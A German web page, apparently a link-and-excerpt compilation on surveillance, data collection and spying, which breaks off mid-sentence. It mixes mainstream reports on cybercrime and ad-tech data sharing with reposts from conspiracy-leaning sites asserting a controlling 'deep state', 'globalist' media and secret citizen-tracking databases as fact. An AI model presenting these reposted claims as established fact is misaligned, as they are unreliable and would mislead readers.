Datenschutz kritisiert: Es werden zu viele Daten ins Internet gesendet. Nun hat das BSI nachgemessen und aufgedeckt, wie Sie den Datenversand komplett abstellen können. Kritik am Datenschutz von Windows 10 hagelt es von Sicherheitsexperten, Bloggern und Firmen. Ein PC mit Windows 10, der aktuell keine Aufgabe zu erledigen hat, nimmt dennoch laufend Verbindungen zu Servern im Internet auf. Die Kritik ist nicht neu. Schon Windows XP wurde für seine sogenannte "Call-Home"-Funktionen kritisiert. Damals im Jahr 2001 waren einige Programme, etwa der Windows Media Player, für den unangemeldeten Kontakt ins Internet verantwortlich. Was sich mit Windows 10 im Jahr 2015 geändert hat, war die schiere Menge an Verbindungen. Fortsetzung des Berichts und Maßnahmen: in Kürze! Five Eyes, Nine Eyes, ... "Wir töten Leute auf der Basis von Metadaten" Hacking und Spionage Ist WhatsApp sicher genug für die Diplomatie?, netzpolitik.org, 24.02.2020 In den Korridoren der Macht ist der Messengerdienst das Mittel der Wahl. Nun empfehlen EU-Experten den Wechsel zu Signal. Hat WhatsApp in der Diplomatie ausgedient? Mehr dazu: in Kürze! Deutschland ist nur eine Informationsquelle für USA Wie sonst soll man denn wissen, dass es noch Freunde sind?, von Rolf Büllmann, BR-Hörfunkstudio Washington, Tagesschau, 07.07.2014 Wer sich in den USA in den vergangenen Tagen über den neuesten deutsch-amerikanischen Spionagefall im NSA-Ausschuss des Bundestages informieren wollte, der musste schon sehr genau suchen. USA sah Deutschland nie als so engen Freund - und schon gar nicht als gleichberechtigten Partner. Wie praktisch jedes andere Land der Welt - mit Ausnahme Großbritanniens, Kanadas, Australiens und Neuseelands - ist Deutschland für die USA eine Quelle an Informationen, die es abzuschöpfen gilt. Sollte es dabei jemals Zurückhaltung gegeben haben, so ist die spätestens seit den Terroranschlägen vom 11. September passé. Seit damals ist für die USA praktisch alles erlaubt, was das Land sicherer macht im Kampf gegen den internationalen Terrorismus. Das ist das wohl entscheidende Problem in der ganzen Affäre: die Unfähigkeit der Politik in den USA, die Empörung in Deutschland anzuerkennen und zu verstehen. Dass die Deutschen sagen: "Das tut man aber nicht unter Freunden", können - oder wollen - die Amerikaner nicht nachvollziehen. Für sie ist völlig selbstverständlich, dass man so etwas tut, auch bei Freunden. Wie sonst soll man denn wissen, dass es noch Freunde sind? Es stellt sich heraus, dass wir einen tiefen Staat haben… und er ist "fantastisch", uncut-news.ch, 03.04.2024 Kit Knightly [...] Halten wir das Offensichtliche fest: Wenn wir vom Tiefen Staat sprechen, geht es nicht um Leute, die Kinder in Chicago vor Ausbeutung schützen, und auch nicht um liebenswerte Star-Trek-Fans, die lebensrettende Raketen bauen - das weiß das Videoproduktionsteam der New York Times so gut wie wir alle. Es geht um korrupte Militärs und Geheimdienste mit Verbindungen zum Großkapital, die in Wirklichkeit die Regierung kontrollieren und "gewählte" Politiker als Marionetten benutzen. Es geht um die Maschinerie, die die Armen verarmen lässt und die Menschenrechte untergräbt, um die autoritäre Kontrolle über die Menschen zu fördern und gleichzeitig die Umwandlung öffentlicher Gelder in private Profite zu erleichtern und zu beschleunigen. Vielleicht sind die Leute, die all das tun, auch Spock-liebende Marathonläufer, vielleicht auch nicht. Mir ist das egal, ich will nur, dass sie aufhören. Die Propagandaköder sind so armselig wie ungeschickt. Sie glauben, indem sie den niedrigsten und liebenswürdigsten Sprossen der föderalen Macht ein menschliches Antlitz geben, so tun zu können, als gäbe es nur Liebe und Licht. Indem sie das Vertretbare verteidigen, hoffen sie, dem Unvertretbaren eine Chance zu geben. [...] Ich bin alt genug, um mich an das Jahr 2017 und ein Dutzend verschiedener Artikel zu erinnern, in denen sehr ausführlich erklärt wurde, warum die USA überhaupt keinen tiefen Staat haben. Ich habe damals eine lange Antwort geschrieben. Es stellte sich heraus, dass sie alle falsch lagen, denn die USA haben einen tiefen Staat, bevölkert von Bachata tanzenden Swifties, die uns "vor dem Weltuntergang retten" - und dafür sollten wir sehr dankbar sein. Quelle: https://off-guardian.org/2024/03/21/turns-out-we-do-have-a-deep-state-and-its-awesome/ https://uncutnews.ch/es-stellt-sich-heraus-dass-wir-einen-tiefen-staat-haben-und-er-ist-fantastisch/ KI, Handflächenscanner, Gesichtserkennung, Augmented Reality und mehr: Die dystopische Zukunft ist jetzt, uncut-news.ch, 14.03.2024 Geheimdienste/NSA/Überwachung/BigData infowars Es wird oft gesagt, dass sich die Welt in einen dystopischen Albtraum verwandeln wird, wenn nichts dagegen unternommen wird. Die Realität ist jedoch, dass wir bereits so weit sind. Gerade in den vergangenen Jahren haben sich Dinge wie künstliche Intelligenz (KI), bargeldlose Zahlungssysteme, Augmented Reality und vieles mehr so schnell entwickelt, dass man meinen könnte, wir befänden uns in einer Dystopie - obwohl noch viel mehr auf uns zukommt. Wenn nicht eine Art schwarzer Schwan dem Ganzen ein Ende bereitet, wird aus der dystopischen Zukunft schnell eine dystopische Gegenwart - und in vielerlei Hinsicht ist sie es bereits. Nehmen wir unter anderem ... Quelle: https://www.infowars.com/posts/ai-palm-scanners-facial-recognition-augmented-reality-and-more-the-dystopian-future-is-now/ https://uncutnews.ch/ki-handflaechenscanner-gesichtserkennung-augmented-reality-und-mehr-die-dystopische-zukunft-ist-jetzt/ "Menschenhandel wie Vieh "Wir, die Ausgebeuteten": Auf dem Weg zu "Soylent Green"!, uncut-news.ch, 23.11.2023 Geheimdienste/NSA/Überwachung/BigData John Whitehead erklärt anschaulich die Grundzüge der wissenschaftlichen Diktatur und des digitalen Panoptikums, das das Kontrollnetz bildet. Die Regierung ist der Sündenbock für Big Tech, die treibende Kraft hinter der Technokratie. Sie werden sehen, wie wir zu Waren gemacht, geformt und in Produkte gepresst werden, die dann wieder an uns selbst verfüttert werden … wie Soylent Green. Technokraten haben Regierungen benutzt, um Tornados endloser Daten freizusetzen, die in KI-Programme eingespeist werden. Patrick McGoohan, Schöpfer und Star der Miniserie The Prisoner aus dem Jahr 1967, war seiner Zeit voraus, als er sagte: "Ich lasse mich nicht schubsen, klassifizieren, abstempeln, indizieren, briefen, befragen oder nummerieren. Mein Leben ist mein Leben." ⁃ TN-Redakteur Die Amerikaner sind eine leichte Beute für Hacker, Betrüger, Spitzel, Spione und Schwindler geworden. Aber glauben Sie nicht, dass die Regierung Sie schützt. Im Gegenteil, die US-Regierung verkauft uns (oder besser unsere Daten) an den Meistbietenden. Zu diesen Höchstbietenden gehören übrigens auch Amerikas politische Klasse und die Politiker, die gewählt oder wiedergewählt werden wollen. Die Los Angeles Times berichtet: "Wenn Sie an einer politischen Kundgebung oder einer Bürgerversammlung teilgenommen haben oder einfach nur in die Zielgruppe einer Kampagne passen, stehen die Chancen gut, dass Ihre Bewegungen mit beunruhigender Genauigkeit von Datenanbietern verfolgt werden, die auf der Gehaltsliste von Kampagnen stehen. Sie verkaufen Ihre Telefone, Fernseher und digitalen Geräte an Politiker, die Ihre Stimme wollen. "Willkommen in der neuen Welt der Wahlkampftechnologie, in der das Herunterladen einer Wetter-App oder eines Spiels, das Herstellen einer Wi-Fi-Verbindung in einem Café oder das Einschalten eines Routers zu Hause es einem Datenvermittler leicht machen kann, Ihre Bewegungen zu überwachen, Ihre Standortdaten zu sammeln und sie an einen politischen Kandidaten zu verkaufen, der sie nutzen kann, um Sie mit Botschaften zu bombardieren", schreibt der Journalist Evan Halper. Auf diese Weise wurden "wir, die Menschen", zu wirtschaftlichen Einheiten degradiert, die von allen und jedem gekauft, getauscht und verkauft werden können. Tagtäglich sind die Amerikaner gezwungen, die intimsten Details ihrer Persönlichkeit preiszugeben - ihre biologische Konstitution, ihre genetischen Baupläne und ihre biometrischen Daten (Gesichtsmerkmale und -struktur, Fingerabdrücke, Iris-Scans usw.) -, um sich in einer zunehmend technologisierten Welt zurechtzufinden. Diese intimen Details sind ihrerseits zu Bausteinen riesiger Datenbanken geworden, auf die der Staat und seine kriminellen Partner in der Wirtschaft Zugriff haben und die anfällig für Datenpannen durch Hacker, Cyberangriffe und Spionage sind. Seit Jahren baut die Regierung ohne wirkliche Kontrolle oder Beschränkung riesige Datenbanken mit allen möglichen sensiblen Informationen über die Bürgerinnen und Bürger auf. Biographische Informationen. Biometrische Daten. Vorstrafen. Reiseaufzeichnungen. Es gibt keine Person in den USA, die nicht in der einen oder anderen staatlichen Datenbank erfasst ist, und diese Datenbanken werden zunehmend von Behörden, Fusionszentren und der Polizei gemeinsam genutzt. Darüber hinaus hat die Regierung ihren riesigen Bestand an Daten über Amerikaner durch den Ankauf kommerziell verfügbarer Informationen (Commercial Available Information, CAI) von Drittanbietern mit wenig Kontrolle und wenig Richtlinien erweitert. Ein Bericht des Office of the Director of National Intelligence enthüllt: [Kommerziell erworbene Daten] können sensible und intime Informationen über persönliche Eigenschaften, privates Verhalten, soziale Beziehungen und Sprache von US-Bürgern und Nicht-US-Bürgern enthüllen. Sie können missbraucht werden, um in die Privatsphäre einzudringen, den Ruf zu ruinieren, emotionales Leid zu verursachen und die Sicherheit von Personen zu bedrohen. Auch wenn sie angemessenen Kontrollen unterliegt, kann die CAI die Möglichkeiten der Regierung, in das Privatleben einzudringen, auf ein Niveau heben, das über unsere verfassungsmäßigen Traditionen oder andere gesellschaftliche Erwartungen hinausgeht. Mit anderen Worten, es ist die teuflisch hinterhältige Art und Weise, in der die Regierung versucht, den Vierten Verfassungszusatz zu umgehen, der vorschreibt, dass Regierungsbeamte einen hinreichenden Grund und einen Durchsuchungsbefehl haben müssen, bevor sie Amerikaner ausspionieren oder ihr Privateigentum durchsuchen und beschlagnahmen. Es ist schon schlimm genug, dass die Regierung ohne unser Wissen oder unsere Zustimmung riesige Datenbanken mit unseren persönlichen Daten anlegt, aber dann werden diese auch noch gehackt und wir müssen darunter leiden. Anfang dieses Jahres wurden beispielsweise mehrere Bundesbehörden, Landesregierungen und Universitäten Ziel eines weltweiten Cyber-Angriffs, der die sensiblen Daten von Millionen Amerikanern gefährdete. Hat das die Regierung davon abgehalten, diese Datenbanken, die unsere Privatsphäre und Sicherheit gefährden, weiter auszubauen? Nein, natürlich nicht. Tatsächlich hat die Regierung auch unsere privaten Informationen verkauft. Laut Vice haben die Kfz-Behörden der Bundesstaaten im ganzen Land die persönlichen Daten von Autofahrern "an Tausende Unternehmen verkauft, darunter auch private Ermittler, die gegen Bezahlung Leute ausspionieren". Wo ein Wille ist, ist auch ein Weg, und die Regierung ist ein Meister darin, Schlupflöcher zu finden, um ihre Bürger auszubeuten. So hat der Kongress zwar 1994 den Driver´s Privacy Protection Act (DPPA) verabschiedet, um die Weitergabe persönlicher Daten zu verhindern, aber das hat die staatlichen Verkehrsbehörden nicht davon abgehalten, Millionen mit dem Verkauf von Fahrerdaten (Namen, Geburtsdaten, Adressen und die Autos, die sie besitzen) an Dritte zu verdienen. Das ist nur ein kleiner Teil dessen, wie der Staat seine Bürger kauft und an den Meistbietenden verkauft. Der Grund ist immer derselbe: Es geht um Profit und Macht. Willkommen in der Ära des Überwachungskapitalismus. Schon mal bei Whole Foods eingekauft? Auf einem Schießstand das Zielen geübt? Bei Starbucks einen Kaffee getrunken und im Internet gesurft? Eine Abtreibungsklinik besucht? FOX News oder MSNBC gesehen? Candy Crush auf Ihrem Handy gespielt? Durch ein Einkaufszentrum geschlendert? An einem Regierungsgebäude vorbeigegangen? Das ist alles, was nötig ist, um Ihre Daten zu sammeln, zu verkaufen und zu nutzen, um Sie anzusprechen. Unglaublich: Sind Sie erst einmal identifiziert und verfolgt, können Datenhändler digital in der Zeit zurückreisen, um herauszufinden, wo Sie waren, mit wem Sie zusammen waren, was Sie getan haben, was Sie gelesen, gesehen, gekauft haben usw. Sobald Sie auf diese Weise identifiziert sind, können Sie endlos verfolgt werden. Niemand bleibt verschont. In dieser Hinsicht sind wir alle gleich: Wir alle leiden gleichermaßen unter der Demütigung, dass uns jedes noch so Stückchen Privatsphäre geraubt wird und die intimsten Details unseres Lebens zum Futter für Vermarkter und Datenprofiteure werden. Diese beängstigende neue Ära des profitorientierten Überwachungskapitalismus, in der wir belauscht, beobachtet, verfolgt, kartographiert, gekauft, verkauft und ins Visier genommen werden, wird durch unsere Mitarbeit ermöglicht. All die Haftungsausschlüsse, die Sie überfliegen, ohne sie zu lesen, die in winzigen Buchstaben geschrieben sind, nur um am Ende schnell auf die Schaltfläche "Zustimmen" zu klicken, damit Sie zum nächsten Schritt übergehen können - das Herunterladen von Software, das Eröffnen eines Kontos in sozialen Medien, das Hinzufügen einer neuen App zu Ihrem Telefon oder Computer - bedeuten, dass Sie Ihr schriftliches Einverständnis geben, dass Ihre Aktivitäten überwacht, aufgezeichnet und weitergegeben werden. Denken Sie darüber nach. Jede Bewegung, die Sie machen, wird überwacht, nach Daten durchsucht, analysiert und gespeichert, um sich ein Bild davon zu machen, wer Sie sind, wie Sie ticken und wie man Sie am besten beeinflussen und/oder kontrollieren kann. Mit jedem Smartphone, das wir kaufen, mit jedem GPS-Gerät, das wir installieren, mit jedem Twitter-, Facebook- und Google-Konto, das wir eröffnen, mit jeder Kundenkarte, mit der wir einkaufen gehen - ob im Supermarkt, im Joghurt-Laden, bei der Fluggesellschaft oder im Kaufhaus - und mit jeder Kredit- oder Debitkarte, mit der wir unsere Einkäufe bezahlen, helfen wir amerikanischen Unternehmen, für ihre Regierungspartner ein Dossier darüber anzulegen, wen wir kennen, was wir denken, wie wir unser Geld ausgeben und wie wir unsere Zeit verbringen. Die Technologie ist inzwischen so weit fortgeschritten, dass Werbetreibende (politische Kampagnen gehören zu den schlimmsten Übeltätern) tatsächlich "digitale Zäune" um Ihr Zuhause, Ihren Arbeitsplatz, die Häuser von Freunden und Verwandten und andere Orte, die Sie besuchen, errichten können, um Sie mit maßgeschneiderten Botschaften zu bombardieren, die auf ein bestimmtes Ergebnis abzielen. Wenn uns jemand auf diese Weise belästigen würde - indem er uns auf Schritt und Tritt folgt, unsere Anrufe abhört, unsere Korrespondenz liest, unsere Geheimnisse ausspioniert, Profile von uns erstellt und uns aufgrund unserer Interessen und Aktivitäten ins Visier nimmt - würden wir die Polizei rufen. Leider sind auch Polizeibeamte (die mit Stingray-Geräten und anderen Spanner-Technologien ausgestattet sind) an diesem speziellen Betrug beteiligt. Es sind nicht nur die Überwachung und der Kauf und Verkauf Ihrer Daten, die Anlass zur Sorge geben. Die Auswirkungen einer Regierung - welcher Art auch immer -, die so viel unregulierte und nicht rechenschaftspflichtige Macht hat, ihre Bürger ins Visier zu nehmen, zu verfolgen, zusammenzutreiben und zu verhaften, sind mehr als beängstigend. Man stelle sich nur vor, was ein totalitäres Regime wie Nazi-Deutschland mit einer solchen Macht hätte anstellen können. Stellen Sie sich vor, was der nächste Polizeistaat, der in die Fußstapfen Deutschlands tritt, mit dieser Art von Macht anstellen wird. Die Gesellschaft bewegt sich definitiv schnell in diese Richtung. Wir haben es der Regierung so leicht gemacht, uns zu überwachen. Die Augen der Regierung sehen jeden Ihrer Schritte: was Sie lesen, wie viel Sie ausgeben, wohin Sie gehen, mit wem Sie verkehren, wann Sie morgens aufwachen, was Sie im Fernsehen sehen und im Internet lesen. Jede Bewegung, die Sie machen, wird überwacht, nach Daten durchsucht, ausgewertet und in Tabellenform gebracht, um sich ein Bild davon zu machen, wer Sie sind, wie Sie ticken und wie man Sie am besten kontrollieren kann, wenn es nötig ist, Sie auf Linie zu bringen. Wie die Washington Post berichtet, ist es wahrscheinlich, dass Sie bereits eine farbkodierte Bedrohungseinstufung - grün, gelb oder rot - erhalten haben, sodass die Polizei über Ihre potenzielle Neigung zu Unruhen informiert ist, je nachdem, ob Sie eine Militärkarriere hinter sich haben, einen als bedrohlich empfundenen Kommentar auf Facebook gepostet haben, an einer bestimmten Krankheit leiden oder jemanden kennen, der jemanden kennt, der ein Verbrechen begangen haben könnte. Mit anderen Worten: Sie könnten bereits in einer staatlichen Datenbank als potenziell regierungsfeindlich markiert sein - zum Beispiel in der Main-Core-Datenbank -, die Personen identifiziert und verfolgt (um sie im Notfall zu verhaften), die sich dem Diktat des Polizeistaats nicht beugen wollen. Die Regierung hat das Know-how. Wie The Intercept berichtet, investieren das FBI, die CIA, die NSA und andere Regierungsbehörden zunehmend in und verlassen sich auf Überwachungstechnologien von Unternehmen, die verfassungsrechtlich geschützte Äußerungen auf Social-Media-Plattformen wie Facebook, Twitter und Instagram analysieren können, um potenzielle Extremisten zu identifizieren und vorherzusagen, wer sich in Zukunft regierungsfeindlich verhalten könnte. Die Überwachung, das digitale Stalking und das Data Mining der amerikanischen Bevölkerung - Waffen der Konformität und der Kontrolle in den Händen der Regierung, vor allem, wenn die Regierung in der Lage ist, Telefongespräche abzuhören, Fahrgewohnheiten zu überwachen, Bewegungen zu verfolgen, Einkäufe zu kontrollieren und durch die Wände des Hauses zu spähen - führen zu einer Gesellschaft, in der es wenig Platz für Indiskretionen, Unvollkommenheiten oder Akte der Unabhängigkeit gibt. Das ist die unheimliche, berechnende und zugleich teuflische Genialität des amerikanischen Polizeistaates: Die Technologie, die wir als revolutionär und befreiend gefeiert haben, ist zu unserem Gefängnis, Gefängniswärter, Bewährungshelfer, Stalker, Big Brother und Vater weiß es am besten geworden - alles in einer Person. Wie sich herausstellt, sind wir Soylent Green. Der gleichnamige Film aus dem Jahr 1973 mit Charlton Heston und Edward G. Robinson in den Hauptrollen spielt im Jahr 2022 in einem überbevölkerten, verschmutzten und hungernden New York, dessen Bewohner zum Überleben auf synthetische Nahrung angewiesen sind, die von der Soylent Corporation hergestellt wird. Heston spielt einen Polizisten, der in einem Mordfall ermittelt und die grausame Wahrheit über den Hauptbestandteil von Soylent Green, der Hauptnahrungsquelle der hungernden Bevölkerung, herausfindet. "Es sind Menschen. Soylent Green wird aus Menschen gemacht", erklärt Hestons Charakter. "Sie machen unser Essen aus Menschen. Als nächstes werden sie uns wie Vieh züchten, um uns zu ernähren." Wie recht er doch hat. Soylent Green besteht in der Tat aus Menschen, oder in unserem Fall ist Soylent Green unsere eigenen persönlichen Daten, die von Unternehmen und der Regierung beschlagnahmt, neu verpackt und verwendet werden, um uns zu fangen. Auch wir werden wie Vieh gezüchtet, aber nicht, um uns zu ernähren. Vielmehr werden wir, wie ich in meinem Buch Battlefield America: The War on the American People und seinem fiktiven Gegenstück The Erik Blair Diaries zeige, wegen unserer Daten gezüchtet, gebrandmarkt, gekauft und verkauft. Da die heimtückische Partnerschaft zwischen der US-Regierung und amerikanischen Unternehmen von Tag zu Tag invasiver und subtiler wird, gibt es praktisch keine Möglichkeit, sich diesen Angriffen auf die digitale Privatsphäre zu entziehen, es sei denn, man ist ein moderner Luddit, der sich völlig von jeglicher Technologie abkoppelt. Was wir dringend brauchen, ist eine "Electronic Bill of Rights", die "uns, das Volk" vor räuberischer Überwachung und datenverarbeitenden Geschäftspraktiken schützt. Ohne einen verfassungsrechtlichen Schutz vor Eingriffen in unsere Rechte im elektronischen Bereich wird es nicht mehr lange dauern, bis wir uns wie Edward G. Robinsons Figur in Soylent Green nach einer Zeit zurücksehnen, in der wir reden konnten, mit wem wir wollten, kaufen konnten, was wir wollten, denken konnten, was wir wollten, ohne dass diese Gedanken, Worte und Aktivitäten von Konzernen wie Google verfolgt, verarbeitet und gespeichert, an Regierungsbehörden wie die NSA und die CIA verkauft und von einer militarisierten Polizei mit ihrer Armee futuristischer Technologien gegen uns eingesetzt wurden. Quelle: https://www.technocracy.news/we-the-exploited-slouching-toward-soylent-green/ https://uncutnews.ch/wir-die-ausgebeuteten-auf-dem-weg-zu-soylent-green/ Sie entwickeln unglaublich bizarre neue Technologien für die dystopische Welt der Zukunft, uncut-news.ch, 29.02.2024 Von Michael Snyder Viele würden behaupten, dass wir bereits in einer dystopischen Gesellschaft leben, aber wenn es nach denen geht, die derzeit das Sagen haben, wird unsere Welt bald noch dystopischer aussehen, als sie es jetzt schon ist. In den letzten Jahren haben wir eine noch nie dagewesene Explosion von neuen Technologien erlebt. Einige dieser Technologien scheinen das Potenzial zu haben, das Leben besser zu machen, aber andere würden den Machthabern die Möglichkeit geben, uns zu beobachten, zu verfolgen, zu überwachen und zu kontrollieren wie nie zuvor. Wenn Sie nicht beunruhigt sind über das, was wir jetzt erleben, liegt das wahrscheinlich daran, dass Sie nicht aufgepasst haben. Ich habe eine Reihe von Beispielen, die ich in diesem Artikel mit Ihnen teilen möchte, aber ich habe wirklich damit gerungen, wie ich sie organisieren soll. Letztendlich habe ich beschlossen, sie in eine Reihenfolge zu bringen, in der sie am wenigsten gruselig sind und am gruseligsten. Beginnen wir also mit dem Handflächenscanner. Handflächenscanner werden in Whole-Foods-Filialen im ganzen Land eingesetzt, und sobald Sie in das System aufgenommen sind, können Sie Ihre Lebensmittel buchstäblich mit Ihrer Hand bezahlen… Quelle: https://theeconomiccollapseblog.com/they-are-creating-incredibly-bizarre-new-technologies-for-the-dystopian-world-of-the-future/ https://uncutnews.ch/sie-entwickeln-unglaublich-bizarre-neue-technologien-fuer-die-dystopische-welt-der-zukunft/ Hype oder Gefahr: Stellt KI wirklich eine existenzielle Bedrohung für die Menschheit dar?, uncut-news.ch, 26.03.2024 technocracy via Billy Perrigo via Time Wissenschaft/ Neue Technologien/Künstliche Intelligenz(KI)/Energie/ Transhumanismus Diese Geschichte ist aus mehreren Gründen verdächtig: 1) Sie wurde von Time, Inc. veröffentlicht, einem wichtigen Organ der Globalisten; 2) die Studie wurde vom State Department gesponsert, dessen Außenminister Blinken Mitglied der Trilateralen Kommission ist; 3) die Autoren der Studie waren früher mit Y-Combinator verbunden, das früher von Sam Altman geleitet wurde, mit anderen Worten, sie sind Technokraten, die angesichts des Monsters, das sie geschaffen haben, ausflippen könnten. ⁃ TN-Redakteur Von Billy Perrigo Die US-Regierung muss "schnell und entschlossen" handeln, um erhebliche Risiken für die nationale Sicherheit abzuwenden, die von der künstlichen Intelligenz (KI) ausgehen und im schlimmsten Fall eine "Bedrohung auf dem Niveau des Aussterbens der menschlichen Spezies" darstellen könnten, heißt es in einem von der US-Regierung in Auftrag gegebenen und am Montag veröffentlichten Bericht. "Die derzeitige Entwicklung der Künstlichen Intelligenz (KI) stellt ein dringendes und wachsendes Risiko für die nationale Sicherheit dar", heißt es in dem Bericht, der der ZEIT vor seiner Veröffentlichung vorliegt. "Der Aufstieg von fortgeschrittener KI und AGI [künstliche allgemeine Intelligenz] hat das Potenzial, die globale Sicherheit in einer Weise zu destabilisieren, die an die Einführung von Atomwaffen erinnert." AGI ist eine hypothetische Technologie, die die meisten Aufgaben auf oder über dem Niveau eines Menschen ausführen könnte. Solche Systeme gibt es derzeit noch nicht, aber die führenden KI-Labors arbeiten daran, und viele gehen davon aus, dass AGI innerhalb der nächsten fünf Jahre oder weniger verfügbar sein wird. Die drei Autoren des Berichts haben mehr als ein Jahr lang daran gearbeitet und im Rahmen ihrer Recherchen mit mehr als 200 Regierungsangestellten, Experten und Mitarbeitern von Pionierunternehmen der KI - wie OpenAI, Google DeepMind, Anthropic und Meta - gesprochen. Die Berichte aus einigen dieser Gespräche zeichnen ein beunruhigendes Bild, das darauf hindeutet, dass viele KI-Sicherheitsmitarbeiter in Spitzenlabors über perverse Anreize besorgt sind, die die Entscheidungsfindung der Führungskräfte steuern, die ihre Unternehmen kontrollieren. Quelle: https://www.technocracy.news/hype-or-danger-does-ai-really-pose-existential-threat-to-humanity/ https://uncutnews.ch/hype-oder-gefahr-stellt-ki-wirklich-eine-existenzielle-bedrohung-fuer-die-menschheit-dar/ Cyber-Sicherheitsvorfälle in Deutschland: acht von zehn Unternehmen betroffen, trojaner-info.de, 04.12.2023 Immer mehr Unternehmen in Deutschland sind von Cybersicherheitsvorfällen betroffen. Laut einer aktuellen Umfrage mussten 81 Prozent der deutschen Unternehmen in den vergangenen zwei Jahren mindestens einmal auf einen gravierenden Sicherheitsvorfall reagieren. https://www.trojaner-info.de/sicher-anonym-im-internet/aktuelles/cyber-sicherheitsvorfaelle-in-deutschland-acht-von-zehn-unternehmen-betroffen.html Deutschland Bitkom legt Zahlen vor 206 Milliarden Euro Schaden durch Cyberkriminalität, tagesschau.de, 01.09.2023 Durch Diebstahl von IT-Ausrüstung und Daten sowie durch Industriespionage und Sabotage entstehen der deutschen Wirtschaft dieses Jahr 206 Milliarden Euro Schaden. Das ergab eine Bitkom-Umfrage. Immer mehr Attacken kommen aus Russland und China. https://www.tagesschau.de/wirtschaft/cybercrime-deutschland-100.html Investieren deutsche Unternehmen ihre Cybersicherheitsbudgets in die richtigen Lösungen?, trojaner-info.de, 04.12.2023 Die Forschung zu Cyber-Sicherheitsthemen hat in den letzten Jahren stetig neue Innovation hervorgebracht - und da es eine ständig wachsende Zahl an Bedrohungen zu bekämpfen gilt, wird dies auch weiterhin von Nöten sein. Die noch junge Cyber-Sicherheitsbranche hat zahlreiche Optionen auf den Markt gebracht, mit denen sich Unternehmen wirkungsvoll gegen Cyber-Bedrohungen schützen können. https://www.trojaner-info.de/sicher-anonym-im-internet/aktuelles/investieren-deutsche-unternehmen-ihre-cybersicherheitsbudgets-in-die-richtigen-loesungen.html Google und Microsoft größte Datensammler Daten enden auf der ganzen Welt Online-Werbung: Firmen greifen jede Minute Daten ab, netzpolitik.org, 17.05.2022 Technologieunternehmen machen ihr Geld mit Online-Werbung. Ein neuer Bericht zeigt, in welchem Ausmaß sie dafür Daten abgreifen - und wo diese Daten landen. Ein neuer Bericht zeigt, wie persönliche Daten dank Google und Co. bei Firmen in der ganzen Welt landen. Eine Person, die in Deutschland im Internet unterwegs ist, wird im Schnitt jede Minute vermessen. Was schaut sie an? Wo geht sie hin? Auf das so geschnürte Datenpaket können Tausende Firmen zugreifen. Das geht aus einem neuen Bericht des Irish Council for Civil Liberties (ICCL) hervor. Firmen auf der ganzen Welt haben demnach Zugang zu teils sehr privaten Daten wie sexuellen Vorlieben oder politischer Haltung. Die Bürgerrechtsorganisation prangert die Aktivitäten der Tech-Giganten als "größtes Datenleck" an. Anhand interner Dokumente aus der Werbeindustrie beleuchtet der Bericht das so genannte Real-Time-Bidding, ein Verfahren, mit dem in Echtzeit Anzeigenplätze auf Webseiten oder Apps versteigert werden. Dafür wird erhoben, welche Inhalte sich Nutzer:innen ansehen oder wo sie sich befinden, um ihnen zielgenau passende Werbeanzeigen zeigen zu können. Die Zahlen des Berichts beziehen sich auf Europa und die Vereinigten Staaten. Pro Tag würden in Europa demnach 197 Milliarden mal Daten abgegriffen. "Google und Microsoft größte Datensammler" Der größte Akteur ist dem Bericht zufolge Google. Doch auch Microsoft sei in die obere Liga aufgestiegen, seit es Ende 2021 die Real-Time-Bidding Firma Xandr kaufte. Zwei weitere Unternehmen, die ebenfalls im großen Stil mit Daten handeln - Facebook und Amazon - sind in den ausgewerteten Dokumenten nicht berücksichtigt, so der ICCL. Laut den recherchierten Zahlen ist Google in Deutschland und Europa der größte Händler. Pro Jahr beläuft sich der Wert des Real-Time-Bidding dem Bericht zufolge auf 117 Milliarden Dollar in den USA und Europa. In der EU sollen es 2019 23 Milliarden Euro gewesen sein. Aus den Dokumenten geht außerdem hervor, dass der Umfang des Datensammeln in Europa deutlich geringer ist als in den Vereinigten Staaten. Technisch ist das Real-Time-Bidding leicht nachvollziehbar: Sobald man eine entsprechende Seiten öffnet, sammelt ein Dienst im Hintergrund Gebote für die Anzeigenplätze. Die Bietenden analysieren sämtliche Daten der Person, die die Anzeige sehen soll und entscheiden, ob und wie hoch geboten wird. Der höchstbietende Dienst bekommt anschließend den Anzeigenplatz. All das läuft in Echtzeit, also innerhalb weniger Millisekunden ab. Zu den Daten, die alle Dienste während des Prozesses abgreifen können, zählen nicht nur Standort oder Alter. Sie beinhalten oft auch persönliche Vorlieben oder religiöse Orientierung. Daten enden auf der ganzen Welt Die Daten, die gesammelt werden, sind nicht nur für die Bieterdienste zugänglich. Laut dem Bericht des ICCL teilt in Europa allein Google die gesammelten Daten mit 1.058 Unternehmen. Darunter seien auch Firmen aus China und Russland. Ein weiteres Dokument aus der Tracking-Industrie zeigt, welche privaten Informationen gesammelt werden, darunter zum Beispiel, ob eine Person Suchtprobleme oder Geschlechtskrankheiten hat. Welche Konsequenzen das haben kann, zeigte erst kürzlich ein Fall in den USA, bei dem ein katholischer Newsletter-Dienst mithilfe von kommerziell zugänglichen Daten aus der Dating-App Grindr einen Priester als homosexuell outete. https://netzpolitik.org/2022/online-werbung-firmen-greifen-jede-minute-daten-ab/ Benutzen Sie immer noch Google? 6 Gründe, Ihr Leben jetzt zu entgoogeln - Tschüss Google, uncut-news.ch, 21.03.2024 Dr. Joseph Mercola Analyse von Dr. Joseph Mercola Link zum Video Goopocalypse Now from Goopocalypse Now! on Vimeo. Die Geschichte auf einen Blick Anfang April 2020 hat Mercola.com Google absichtlich davon abgehalten, unsere Artikel und Blogbeiträge mit aktuellen Nachrichten zu indizieren. Ich empfehle Ihnen, die Datenschutzrichtlinien jeder Website zu durchsuchen, um zu sehen, ob sie Google Analytics oder Google Ad-Programme verwenden, und wenn ja, sie zu ermutigen, damit aufzuhören. Nahezu jede Website, die nicht zu den großen Unternehmen gehört, nutzt das "kostenlose" Analyseprogramm von Google sowie deren Werbeplattformen. Leider sind diese Dienste nicht wirklich kostenlos. Letztlich bezahlen SIE dafür mit Ihren persönlichen Daten, denn das ist das Produkt, das Google verkauft. Zusammengenommen stehlen all diese Websites eine enorme Menge Ihrer privaten Informationen. Die Befugnisse von Google stellen mehrere Bedrohungen für die Gesellschaft dar. Zunächst einmal ist es eine Überwachungsbehörde mit erheblichen, aber verborgenen Überwachungsbefugnissen. Es ist auch eine Zensurbehörde mit der Fähigkeit, den Zugang zu Websites im gesamten Internet einzuschränken oder zu blockieren und so zu entscheiden, was die Menschen sehen können und was nicht. Google hat auch die Macht, die öffentliche Meinung durch Suchergebnisse und andere Mittel zu manipulieren, und die dadurch hervorgerufenen Veränderungen im Denken sind sowohl schnell als auch enorm. Anfang April 2020 wurde 